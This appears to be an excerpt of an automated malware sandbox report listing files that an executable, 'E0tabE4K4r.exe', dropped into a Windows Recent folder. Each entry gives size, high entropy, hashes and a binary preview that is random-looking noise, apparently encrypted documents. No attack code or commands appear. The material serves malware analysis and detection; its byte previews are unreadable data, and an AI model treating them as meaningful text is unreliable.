                                                                                                                                                  Preview:SQSJK..m.#." .\..1....Z..l.........$.sAd;o.4....0LV...a.'g.-VU.iS.&~.........q..(..........2.:..{.[7M...s.....d.U.^.j?@.O........1..TWs..>u.....w.[..wc......kq..&.e~&.......s.c.....?.e.l..P.;7j...ciq.D..^...............I7..~.7......-g.i.....oX=.|..&..".z.=O.C.j..eH#C>..?p..D;.".c>}Z..e,...l.Y...^.-.O[...G&x.y(<..eK....;.".O..+.m..D...3N..I.....Zz...51M..RG;...8.!....I..=./.7..`..#E...ZY......>y2....M.gl{......l.2.j.....!!."...`.c..E. 6h.......H.3...%.8Z#.V...A..-...3....d.C..P..Y..u...u.T!.. %R1..OV\.ljfWlp.]U+...d....6`..a:..q...ye.....vW9q$.T~.OlR.x[...-.c..U.....H..H.e<.p.........K!z. .E..X..iD..G,.z....^.Pz&;b%.Kj.}..kO_....ZzB.K..ho.ne.'x.........g(.}.|.Q.O1.W.-<.(@..z.h..A. ..!..........w..3......x......~..;;....x..Ef&.{.G....F....^p.{fH<d.]0Bf.,.>..}.1[......N.].J.S..|4\p...CTR.i..a....Qm3~.6.=.Wu...Z_.....-7K.Z..')...L...![..0.f.F.V.L.x..UI.t..62I..$...E.]8....d&..~.h.<...F..b3..=I.....}l.:h..a'.w);.....|.. ....G..Y[8....I{x...........=.CCnv.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TQDGENUHWP.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.858906327993815
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:9bwLirDexXXcFS4UR5J9IbMytTjLQk2erVMgfgIXVEFHN03dWh1aiGythdQ/+o2X:0irDexXXT4g2ljLQmrVR/lEFHgAopyxR
                                                                                                                                                  MD5:1FFBBE8ADA6B1B2E17A7AACD6CCF34AF
                                                                                                                                                  SHA1:73BDEAA6C223FF6CFA2F791AF8784BF88EEB9E81
                                                                                                                                                  SHA-256:E424548C5DCD83C5D06A77926876D7BD4CA761CDF6843B3C8A6CCD73E880BD01
                                                                                                                                                  SHA-512:FB9280CDA6CAF2C604C00A9106EA81A62320E821BDA250CF9A6F942061AF357F7B987E7E7EB0B3C80E74157C5CB6DAF37E9C2E2289D59625BC173A9D2895390A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE.vWjF.zD..m.z .u.O...q......D.I......g'.....G..sO...d"........;S.L.U.)R6?{.,6d2.0.,J.U.[. 6...R.:...1.U..Dr9.{.Sv...4...6.Y...........N.J.....53...$.V....pc.......L/..g|~.b=.{ ....dv..qz9uAIG.{..^...m.^.0.|...R..g..c...0...Q..).?SK3y..fB1...''y..-.7.&.l....o .2..../#..[..jC)n7nx........X9z.....]Q...)T.LZk.....L..1.w.X.;.......F.....*.da_;.RUB?U..C.O....!S..I.<....s.vZ.p..;4,g.F\@....yya.t...<.<0J.1......h....Xi.I....Yj!b\........4.5{.T..p.a.X..z..a..i.?_z.9...KV...z..@.c.Y...n.8.....4..X...B..m.`.[...{h.(<+|...,.z........A.u.uP.Rh.......^...]....C#O....7....7....k.....r...8..4f...Q%..%.._.Q.t.....g.`.:......Ln.....k..'4..q^...oa.F...m.....n .m.C@ea.......:..%.k.bC..)._...D.'.'I.v...9..5..k.x...0KX=.vO6.o'u.D..?l/,.27....M....O.F.....V.K0j..Y^.T..}m|M.;...ZL.`..=..IZ[OhH...s.......d. 3...E..%..Va=...{d....}#U...m......r...f..~2...*...+..f.'>j.+.B...K/0..a..R{..[..b.7..eJov[............V.c....r...F..L...3"......?..

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TQDGENUHWP.mp3

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.846955282966085
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:DoDICleqT1OVeZ4otw7j33NPWrwHeXlGSD8zaOJcFDOxQhAGq/WRPFy88hnPWM2X:DoMCIqToK4dXHNPWeeXlGy8HaN6X1zhi
                                                                                                                                                  MD5:AB7E2DA9231B2AE4F629F2A65C8CC21A
                                                                                                                                                  SHA1:F4585D10A9EAAE7506198B71A4957FE0E042E6D4
                                                                                                                                                  SHA-256:9DA8EE5E5D868E4CABA77BD4949F8A5D8AE4CADE1ECDD98B076CFF4EC571810D
                                                                                                                                                  SHA-512:E25733986A620179567D38677F07D4AFA3119E66939356D37CFE5F685BC08011229E412AFAC7A7A0EFBB6CCD84A0F3201D803413010D8FE1621AF529E4F21ED7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE.V.=....|......r P.h})....9...v-.........-].|.YU. .6.=..?...\P|.....4#".......p?s..c..~d....8M....e...:..&...../.%...Z..j':....3..c.l>...h..\Y....^.t.a..,..j.F..t..pOmc......&z.B^..Q.~~'.P.].<~S..)...L...A..g..k0.....T...x...2`....*..2X?w......"....?..yzg.CT=.<.9.u<8C^..[t.........F...dnk....U....8.....!.[}_.zN.9..3.s!(-..D.G.(Ij....H...0+l?Y.........r'....$@.@u.S...j]'#&..3.7.p.i.-...e.TW.....^..*......R..D9B.yTA%....../|..WD...A>..i.#.w.F>j.>Z._..n5.&y..9K..^......,.:..H.....N...i.`".G.z5?.4{Y.N0M..$..M..R.jJloF..U..(A...;v.+....p./..h..p.G.d.e%..s........f...39`e..Iw/........%..".k..a.I.Oy\.b..E.8....YoF....)...l.h.*.n9../..)..k..P<H........Sv..Z.r\...w...17...X"EFe....p........1Y.A......p...,......=.\.._..kE..!....l.w2..q.jwN.!..Q.....)U...T...8R..d..,../x.dL..-!#.[8b.kLK.D.Ab~.U......<...=...p......<e...B).[...9.d..N+..|.o.+4..8.m.62...V..kd'.e....Q.......!ixGE.i...0;.N...#.S.Ef....{.......IZ=6D...V...(...ts...td..3#1...h.Fl..

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TQDGENUHWP.pdf

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.86575407683932
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:3adIyXHypRUHkOCWChDDUWTKKg1xIjdu4JPwNiDEzx6dGC/FcEciZL04Gt0geGTQ:qd/6RUHkzWChDD5Hvdr2iDEzwGcFcULx
                                                                                                                                                  MD5:AC1A1D68DBB467B46F6814CC1348D3CF
                                                                                                                                                  SHA1:1BEA5D45741D15FEB148A3C19F8A340798B1401A
                                                                                                                                                  SHA-256:FCD373E66531C205E78D5631A1AAA9A583005FD67A7B17F1C35AE825BB2F1EDE
                                                                                                                                                  SHA-512:4AC323F39EBEBE5DB76AC5647C24BAE5164B3D254324C07E7799DB3701561660B2AA37A37B61FFDA9BA1124B68EAC89A787CEC625B4254F49A25B6C476D93F87
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE..]c22.T#....x...0.U..l,^o{.p....:...Gx.>G.....eS..a.V.uI.N.`.%1...]*...89.sd_.P........g.<...&....<.7..%..W.H$..r32.J^..4.7.Q.=V...?.V.3.....r.b...1.N+>.....5.v._\`....v..#..`..J3.C.s...".?.....p....y.D.k3..>..5.#.U..W.Z..t.F.....4.....gq..,N..eo.l.S.cb...+.?..../...1.._B.........|W.6..1.~.&.E.{.m...H..{..~..x..Jf6$.R..)U....(.../t..z.....|.&E2.G.+.....V...jjw.0p.d..c.V...L.9...Z.5.2..t.m._.p.[.... .#K.....O.]......F...RZ....~.d6....B...q..l...)..........\.qDn .T....Y.\...x6C@1..xD.dp.B2..:..*..-..G..IM.....9...O$^.H....i9....K....s...e....o.Yv/P.M.s.aY...$}.._f..D|hx.5...k6:2....f.X?g..m).V.B...\.P.-,g.....cw. .:I....JPI..5.Y.C3.y..$~....../..`.zK.....x..N.|...,9.............;.}......H..IL.I...6I....}I.Ub..Q.*....r..B.b.%..cjiJE......VB[{*P.I.=...f5P..T.\.5d.....G....\.8...m5.."}.=Al..C\...d^`t.j...:....^.-...zG..9.Mww.n.R3...b$..;^....R>..].f._.."{...kd.v...Gu.........G.T....,.M....c&Js} U.....y|.`..s.[....._..4........=7.=.SQ.IX..U.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TTCBKWZYOC.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.8556269693781005
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Bf0aNlNG1JP6pG49FeXPUtb/muMqqaci3Ps8e33vA+xFyty30J7AHEB2bD:BfDzo1J7QFWPeHMJac+PQHvAR7AHPD
                                                                                                                                                  MD5:BE30A70AA1FC45C9D1D5A348F92AB97E
                                                                                                                                                  SHA1:47BE8731B378350D6904D62FD713AA7195F9B3C5
                                                                                                                                                  SHA-256:5CBE65B15D373AA646DABE708D6D2C51374F848C7610CA5E682C8E9CCCB9EA5D
                                                                                                                                                  SHA-512:530A48A4375C418D79F66D6AC950F63A6248FD8806B6264941D2334AF105E555C572621D567EA68A61950E1EB9694D4038F283A516598C53BC6A20C4C5294243
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK....7......Oq.UfI.[....Od._...y.=./^...b...U.5.~z.&...?..-p..f...Y......d...Q\..?%...}.k..A@.:..s.........@.....p..N.....NG..wx....N.+`.bR...I.T......iEH_A}...K.:...]....k<g\....%.U....9..^f....3S..sb.*.!..J...A.=......A....\*$.;..:>].qh...b.&..+!8...i...........Q..........5dk..z.G1]..x..J8A....P4.{..t(b.f.Ca.......d.....g.j..(.. ..s.(~..j..zo...~.t.r.n.~.@./.L..U.C...s.N..v..oP.y.j....hsm.Q.C......Hn.s.prX.O*Qx.`.'.NS-;S{.O.[....=.l;.....U...q8.[.N.i.....Z^}v.`.Ww...t...[.....u..UEO...=-...8e".hu.p.x.1O...FBA..f..."+..p....".....>)i.y.r[..5........,Q.......kzKe.}....$%..q<.wX....l.cK......t?.[.Y:...(..,....m|...?.wM..[,f.p5'_..jY.n.S.cb.{X.N..S...~U].....r..0.g....e.b.d.p..6|F.RmO..!A..T..O....n^I..z..dq0...K.....T.wh..........&..Dtn..K..")..............80UY.....#..!.]?h[..DBR&X.J.....D,.NE..W}N...A..Gh.5.%..1l..X.']......]..\......K.....-.n.l.O`x...4.r..^m....#...:.$.2...\SlbG..@....5.D;sJ.,..N..H...gR.I.q..A'H.n..";.3...,/f.....2`.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TTCBKWZYOC.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.858248537485456
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:PURIEfGA9lITgkcYNxQq2CarIabHs4NQTk3ApmHpTfO0r3W11qLeDTPLqX42bD:PUffhIENY4q4EabLCTkw8p6pvPTzUD
                                                                                                                                                  MD5:64B4F20639BBF54ADBF405FD74F6FDCD
                                                                                                                                                  SHA1:DE8C15A400C268E0A986CB77B969D2AB7DEB934E
                                                                                                                                                  SHA-256:0BB66DD41DB97EA8403ABB8689CD0889AB7D42A19B361A726D84C118AC9EB9D0
                                                                                                                                                  SHA-512:006C742521CE3EE5114BE2B7399288CF2CB958932044DD362A923EA847FB82D7FEA1D3DA7075037A184B3D5DC290E6B6DF8501642AF1464AA63BAAE3CB34BAA9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK..$.vJ2\..W.w...:..\.b6..I.s.......6.:K.T.Exs..M...1.d.= .u#.?b?..w#..6J.[q....Q.G.!.s.-.Nh\I.:6...T.g..Z<..qS...[R61..Z.*AT.......1..8..I....-.&...l.>.F?...&-..w..9.... /.....X...<fm...z.....[...&.7g"Q...._..d".H..+.......PamL..j.?.....0..E...LJ.v.hm....U.`ay%.n).1......F..FX.H...5..'.....s.T4..mA.,./......c.9..R..F...D..]B..{t..]..z.X)n.=E8Ey..";...9ym........gw....~..F...".....LVmg.hs&...)#..1..M...u..*....B'.#..........`........t.._.&.d.'...h..F..r.X....<k=.+...+.....&..v..9....Cd}....P..;.P...l4.6vbI6. +.+.......U4....H.u......5....%.mk.=l./..}.+.A+8..a.u4cU..#.B/..a.L^.KSw..g.U...N..]...d.y..0.>....N4.k........Eco..j...<?.........;....];....rl....|...I0.Z..W.t.Rw!...?.Se...v...1.X. ..(\...^.....Kv..m.)Ar....8.~.#e.;..")..?X....pgu.L^`.........&.C+Z.....cSAv..........-.....'...C...jg...fB0.@..7h..ff$..B....B."...j_d...Y..n.>e....H.g..M=d.lP..<.fy.3.T.h.......Dw$|".]..SGV.X.]._.[.k.......o./....'..R...-....=.6t..n%$.\;......Ji,....

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TTCBKWZYOC.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.850071554194392
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:65JonIGoIVb46fEa9EQrk6096mS9DQBSvNihE1HTmWCd1eRe972bD:6DoJoI5tEcrk609SrFVyFk2oD
                                                                                                                                                  MD5:52C749824A757F348E4130D13B26A26E
                                                                                                                                                  SHA1:29794ADE1BC0D1D4A9C5186AFC9FEDA35C53006E
                                                                                                                                                  SHA-256:F55B61CD53821A12AECC1BCACC7E7471255AC7AA2127A4C14A4A7B928CB99D59
                                                                                                                                                  SHA-512:C06D81A5F758CFF0CF1582CA4EE35EFCD96D71C67E43B6919D970454248C3424F318EDB1E3CB6DEA66BBEFDE7EA16099729529D6A874A5C0E5CF4EC088B4B424
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBKA........'d.)._.t\.~z....xh. 2.$.S..h.J8NI........y...<Y..Rj:v.....N..h.[..wb.*.9...W.+Q........Z.`.6[_..D..7.Q!..5/^...5..f......|.j....H.T.x!.l..z..&`.<.[.y.L...{...Z.}1.c(X.].......=...b.?..`.i.......#..8....TLKC.t.*l....S,.R.K.A.a*.n.B..7L.(....@..G...^`k..........BqZ.P/...v..B ..X...s.}..y.h.[^I..I.c.)32H....I...G..@...mU..q-IP'O.......N.=.....&#.M.......C..s...4U...a.-.A..}i.Wk.<..s..Ei.ir.8qA.5..c:...../+A...b#6..l.t..s.....P)w......M.....{2...ilH..@....?.~H^..1K.W...~P.1&v.].K..1..+..M...&.L..JnO.z.[..b."...dOR...g....NBq..v.z.....f].2t6..h..^..W.G......cJ....|z:a.m..{.........-.D. w../....._g...q.H........"......4..}...^[.D....6.....FW..lg.3.!5.&..K..;.|.q..4=..]$...E.'.#b.d.UX.a.bk....."..GN...c)AK..s..U.uV.i...`..o..Q...WR..@.6M...|2.2n..&.L.`.k.V?..kmE.M}A..J.0QR...W|V,d&yI...J.....V..d.....\......</.....T..R.%.h.Db.g1.:...,QM.8.pP.....a.......'.l....@j.m.'...E..OO..).Ot`..q|.8qt=@.b..Y.&....-..!....ikIs.,......R.n...J..../.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UMMBDNEQBN.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.854810315367942
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:aTnYTOFMnurZ0a/VUHlBAtwbf3mHdodMTYSC55rz/XiFgfq9Pmlyh2bD:aTnYyFMuLYAtSvydo+TYFpz/yFgfoT6D
                                                                                                                                                  MD5:4B39496F8627432243960B8933A5820C
                                                                                                                                                  SHA1:97D3CCFE0923A2A75112ED1B38CA366E2AE10FDC
                                                                                                                                                  SHA-256:FB02A73AA68F85AB1852ABC0A3BA248AA61BEE603B162119D36EB8882CEE65E3
                                                                                                                                                  SHA-512:9E162A9A8A0B37D782A5BF734B17D687762099E8A5A5E14975431EC6F7BB2DF0DC3A6DD989BEDB67D79FF074594C4D4FDF7A35D5CB29E82F6EB2ADFB4E0679B2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:UMMBDz.9).I..9-.&..j"TN{...n...*...]/.Y4..\F._......{.)..0.3.P..H..5K(.J..Uhn.kC.WG.=ZJ,de\.D.Q4.Ys}d.9F.o.Qj.2.!..V..u.20...4....-..a..|#j.P..%...e...:.Zt.i......>Ec.^.&.1..A2.$.C.........!.H.Lx%(t....j=.m3`.......6C...C....`.]....i..`b...C.BF....Z.n.%..6<.'.'..4.4..2..].............'..T.../q-^Q..H.4im^...4.....M.;Ax......S....S.c.....f..6.....koZva!.D5...0......Yl"...,0.......%."..C.'..4..vP...8.`.0......-...jc.........O..dm...K\...vR.A..27.q...K..,..a..{.px.....1.]..!m.1..q#........k..Mt..#.. s8....@'.k<..)R.......Bb...P.M)@........|...)z....W..(..&..w$.F.hTdvi..|..........R.SZ.o...._.`.(.Hr|a..-..2k3l.. 5.|.......|...z..]^.P>.#."b1...&...{.G..\.].+..O.1."ND..H.Q.,.Ji[c...........g....P\r..CM.......g.|.u.o..Z.7?..H91C..B.d` -.P^.. .m.U,fDV/...A|...&..1.C.Z.S..i..Q..*..y..m..?.\....m....I*..Q.P....;...F.`..e<EPN...=..g.q0E.....3....*x...S..r......fc'.....E6.h.DS.....[,}A.v...>.QY..[.u....+H3jD...[(...y.5.._4NB.7jW.T.0;..]..2}z

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UQMPCTZARJ.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.850304552200516
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:aS8Jl02e5/sjUf6t95amsmoQmkqtJ2z9r5LnesCNd1lcTmQnj7fwUV2bD:aS814gUfOVsmitQr5isK38mQnjL7uD
                                                                                                                                                  MD5:2351ED498FBCBD5260BDC47B56863D8C
                                                                                                                                                  SHA1:F3935DB49202A524E5FC3E0310C26D0CFA6492AD
                                                                                                                                                  SHA-256:E6AE2BB7ECE9F173B426DE83BF199F30AB9DF218E6F079F6CDEAA2E1A35A1DF4
                                                                                                                                                  SHA-512:3AA4C9B01A08E6CC730FD412F9850D4DB17BF9ECEB063840A2B10F77A10A89E49A9FF715F09001A06D31F5BA3461C4864F323F1E22D419E4B9E9AB7A1B8DB5EC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:UQMPC..].....(...y..{.B..>.z.T..MG..J...+.S..M....<-...)..+.hN?Q....u.Q..........]+Vb.d..&.;.1HY=...d..(..d.jnf:.:`oD.G....D...A.+..%o'4e.A>.:..........4........:.Qr..B.........;A\iz.8.Q...$..C..Q.S.X..S..od\.....x}....,...26.......bR........I.`...C/Fo..).2!Gah>.0.1~.....z[.$......o`..GY$.fK.J...w...g.....CGq'QL.h.3.2...H.+....4....._....G....q]Ckd...b..L.>h>D"S.(aa.S.f.G.-..}...2;d.`.O.._K.s..^........X=....z...h..ht..I..XX%..^1.S.....[....\|USt.l.`t+.l=......?+...1.....Z4..lvG.]..z...r....\...Yl.B.LO........B..47.V...5o...+.Uny..j.p....+?..:0.@Q.%..;.Q...{...b..0 ..{@..U.........|...5.......^..<X@J.jR...f.....~Y3.l....t%H.[.-...0&.3:.,h.O~7|.(.9l.J....Y.V.e..7R/.5..b%/"g.N...G.n...W...;.}S.m.G..j........5..]..hI...#..8..S..u...s.Q3.....-.6...W.ln`b..1.1...O.O.[N<...;u...v.M..f7...X'....^.b......ei..... 4.W1v;3.n.B.......RVb.X..a..y..~a.F*?..d.....8...|......e..D.....U.s.aX..G...=.M.[F.......rC.....b....s+..NW.|..=L......#...8.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VQCDRUFMUU.mp3

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.870417240427034
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:wh6yTZ+Z1vwD+W7VhUulpN/W9sUV/ZOXLdQPp9VanQKHIO7Z89uo2bD:wtgWJqGjWCUhZaRy9VanTZ8yD
                                                                                                                                                  MD5:00DD538E6D3AAB6274B613F4C21BB8CE
                                                                                                                                                  SHA1:5844C46F184B24E482E6ACDA3B06193ADF5ADF85
                                                                                                                                                  SHA-256:EBD51DD2569C2644669F9C37B45917B55CBED2A284F453821141B1E3389F3DB9
                                                                                                                                                  SHA-512:B0569ED0056DC454187673484A74C8EA37F544AC73D47A56334FF0A0719C9B6F6B5E885A52B08C52323E12D2155711F681DB18EC7A516DB5EC81D2D7D33A7581
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:VQCDR.> ....{7}o...c..@3j.?f.{....ef..,Jg.^..rH....T.<4./.5W.i.\.G%&....+$....6/-w:.A{..j?U......kw].Z.j...........A...TE@.4..5....z$..O....c.l9....A.Lk..H.f.E.>z../.[.D.ZW..h."y.-...{.#j...UY'.........I..km....y...("...k..Zw..b]I..+.$v.&.X]Dv.u..#.f.1.zXj2./.E....+....!(.D......J2p..Y.m..)..5RJ......De..'...u...-..;....P.ZP.......Z.......Q,.>2.G/."xl...f..t.h$I....4.rV4....\G.(..PU....t.....V.F..Y.d..|w.....{._...w$6UJ.F..W_.Q\...N5Q..".I.0.Cx..*..9....{......I...e.}......7.O..<............gM.........sM.....j..N*......V.I..,.".<M.~.X..*E..,....K.g.~=..].1.B...h1T.o5....$..D.."..q.N..._}_k....R......i...;E......f.i.Dd.3-...h.m..h}...8..b..C.d..W..P.`.|......G..N...j.i..,.c.V..l&....=.X*KH/...\{<8.v...hi..y.!.....#d..gD....Me~I".._......p<..[..a.....;.t...S.....O.C..!#B...' ....$H..8.....z..U.$z...t...$...x..T.u*h....@g.....N.G...Q...q~.{.dm?6.G......!._3S...($.:.V].X.....J....)./*c8.l.sV1:..w...M.....H.. ...4.......M*.n.(.s..F.PuX\t..`...0

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.pdf

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.838785167712684
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:1BEb2WUP927fyVpFiLY1zxRwu2Q7+Zn7SUyS2lNnu/CUREu6F4JftOnzBoV2bD:nVP90y8LUxRn7+IlXNnu/CU56GJftGoW
                                                                                                                                                  MD5:8EFF5F7016900F6856A3F21017B4CFBB
                                                                                                                                                  SHA1:56ECE6E0811E573FFEA2893C7544B84D9C43E24D
                                                                                                                                                  SHA-256:433E0379BC2FB40F37C6950973E51CE48CF56348CC2B1239DD5BA449E4BBEB04
                                                                                                                                                  SHA-512:C0BA015365682E7E921E1E805908DC0B79C7885B758A0C24868CCD560FB1C142CFF30ADC8DB6655C3A20DB79D699E4839850D004A65CD8B957E8D399D342B36D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:VWDFP].x..b.......4..h..q.......$Ip8.....}.Mkn.-3jA.1......a*....U...].%...,.6.J._.........k..Wwx2..x...f~.{3.....cZj..,.C.\U./.=.."..P.S...I..lq..;&.....7..*.5.C..FWl.d.EG}b..1....))8...:..<~o..L..7...C=aS.i.zq1.)...GUB.Z.t...`......Z[..T\....8.0..*....q.....X..\*..c_.....m..?Z...>.....Z..G.O.....x..Q...&.sO..R..3.1B..>....Gs...y9,.y,...B.z....Rk/.,.2U..P......,.*`7....)*.|.$5.....{:c}.......Ff.]!...,.......1...@u....~&..[K..;C.`=u.y_.V....G....8.UphR7)./...Q..{).".v.S:......1..nneu.f.z...,.5.F0...:M..&.o....\.j... .a...\B.ja..(BI....S..*.|....Z.1_..@"..V....o....:...t.B.$...e..8....'+..@. ..N...Z......z...)....y.............erT...1....e...M$..LX.V$i.Q...[..g...}..g.h.{K.S....A...t...Z@@O_..w.?nH.V..T7..........7M.. K...)..,u$P....c.D..O.2q.+...6..}......b...S...~.4.K.X.`.!.N..MXn.&.........ZX.E0|..*..TL/?{R..Z..z..6.{.nL.s.:`.tWy...L.J.-.....9..Pg\.[..y.._F..V...S9..F.T.)......./.Yd.#........M:.`.B.2...^.....@....E......V..i.>..

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WKXEWIOTXI.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.860203365135462
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:kFbUZMFL5jGG4cPR8GWCeT6PZVYJm7J+WJp0WDd0FMrpWcY2bD:kFwQtjgC++P4q/P0cAGD
                                                                                                                                                  MD5:590DE91C2A6E732B0988752D567441DC
                                                                                                                                                  SHA1:01AF62A1CDA4F5614635747C1AA52FFDE4DE2551
                                                                                                                                                  SHA-256:04CBDC80A0C7398D3601007F8085F000D70EC41BB5C4757FBDB7168603C022D0
                                                                                                                                                  SHA-512:C8C58E4236DC834BAABFE8B119804F1030021BD6556B33A66399A3B7584F294CD81E0C636CAD06944541F11D2A18AF13FFCF25DF4839FBFA0C4E6E90542DDEC4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:WKXEWK../..L..G.....u.......AN.8U..N%.O....lg...b...u.F....?..%..(....6.Q.7.5....~r.X@>.u.....\..Qq.*D.........f4...\..f..I$g.B.yU.04..7.P.f.S..s...t9]d..s...U.#.&.....U..X.D....A.....W4W.H7.@4..C.{]7.M..o.3]a!.'Ei.,.z.(Sca..w.-ZR.K...,])..`Z.P.MZ..|.b.UYXs /.1.._H...r....8.xn..2=...lx.HP..`...:T......b...Si.a...(.`....N.3F.~.U...M.f{....;.:.k.~Z].........T1.Q`..(+.ne..Bwupe-W.,7.........3*.....A.%...BtL|.?..]....mG ..m..a.....e-.N.W........d..-.C.5.L/.z.Q.....l..y..l.*.C<.s....4.L{. =..S.e............<.D6C:..!s..'....P.......1.4?(}..bj....9...q.........x.f. .'YO.Jf.....@..!.Ewm....<;.fFH.%.,.B..}.....y.-!<;..tK.O...{..T.g.....*..*...C..n....8fs..2.K7B6...............[dD.E..V......R7P...e.!.*.xn...S;.M.`._=.h....+..*.....,.^.m....R.G.0S.*...|.j.[@.]..&p......q.{G..nb..d...........O..bQ... ..\....C#[.C.$....j.|qJ....sA...c....}...";O.....L.V.5..eW.FZS~...:.[..mb.IB....)...k`....V,.9|..Z..02.g..4.......TyrS.y...H.9.T.....c.6.......N...

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WKXEWIOTXI.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.837656588032206
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:g6IQQy5tMrm32+brVQRTEsvzCAx1i4wdsjTyp5aa30qv1fdClr2cKpdtgA2bD:uH6lVbriqs7F1cdsjTyp5aa3TvdJcKrI
                                                                                                                                                  MD5:07BC7E0B93A068D12746E88FD815FE8E
                                                                                                                                                  SHA1:13A02CB8260501CB243D80B487E64F2F7F90CD1A
                                                                                                                                                  SHA-256:9AB373DF5915250F1AADBAED050159384C04F96566F19F8135426050D5697093
                                                                                                                                                  SHA-512:02BE33C9C9E0B6236CB923B69DC105A73C6C9E7018BD05B62AF085DC14CFF303403CF491C766A476EDDA0C2EC4C3784D83CB160328CFB1BADC0B9BC7A36D9AA8
                                                                                                                                                  Malicious:false
